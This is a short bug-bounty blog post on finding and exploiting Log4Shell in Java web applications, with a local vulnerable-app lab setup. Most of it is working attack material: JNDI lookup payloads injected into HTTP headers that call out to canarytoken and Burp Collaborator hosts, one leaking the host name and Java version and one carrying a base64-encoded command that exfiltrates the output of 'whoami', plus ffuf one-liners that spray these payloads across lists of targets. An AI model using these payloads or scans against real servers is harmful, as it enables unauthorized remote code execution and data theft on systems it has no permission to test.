How to find Log4shell & Exploit it - BugBounty

Yes I know, everybody want's to wash their hands in this flood. So I will share some tricks to find log4j RCE on vulnerable Web applications.


What is Log4j?

Log4j is a popular Java logging library which is used by many of Java applications available on the internet. For more details, read this.


Where you can find this?

Any application which is using java and log4j library can be exploited. So you have to find any input field which is logged in application. These are the few key areas to look for :-

User-Agent
X-Requested-For
X-Requested-With
Authentication-Bearer
X-Api-Version

For learning purpose

You can host a vulnerable application on your system to learn how to exploit it.

Requirements:-

sudo docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
  • Generate Canarytokens or you can use your burp collaborater for this.

  1. Select DNS token -> Enter your email -> Write anything in reminder.

Steps to exploit:-

  • Open vulnerable app in Burpsuite repeater

  • Add this header with your canary token payload `X-Api-Version: ${jndi:ldap://yourtoken.canarytokens.com/a} `

  • Check your mail

For impact try these payloads:-

${jndi:ldap://x${hostName}.L4J.yourtoken.canarytokens.com/a}
${jndi:ldap://${hostName}.§§.${sys:java.version}.yourtoken.burpcollaborator.net}
${jndi:ldap://dm3v6xcr9b9d0gkcut2rd0s84zaqyf.burpcollaborator.net/Basic/Command/Base64/cGluZyBgd2hvYW1pYC5kbTN2NnhjcjliOWQwZ2tjdXQycmQwczg0emFxeWYuYnVycGNvbGxhYm9yYXRvci5uZXQ=}



For Automations

There are many tools available on Github for scanning this CVE. These are some of the best:-

~/go/bin/ffuf -w "$1"/dirs.txt -u FUZZ -H 'User-agent: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Api-Version: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Requested-For: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'X-Requested-With: ${jndi:ldap://yourtoken.canarytokens.com/a}' -H 'Authentication-Bearer: ${jndi:ldap://yourtoken.canarytokens.com/a}'


ffuf -w httpx.txt -u FUZZ -H "HEADERS: ${jndi:ldap://test.burpcollab.com/a}" -w lowercase-headers:HEADERS

If you have an application with many features, then manual approach is best for finding this.






584 views0 comments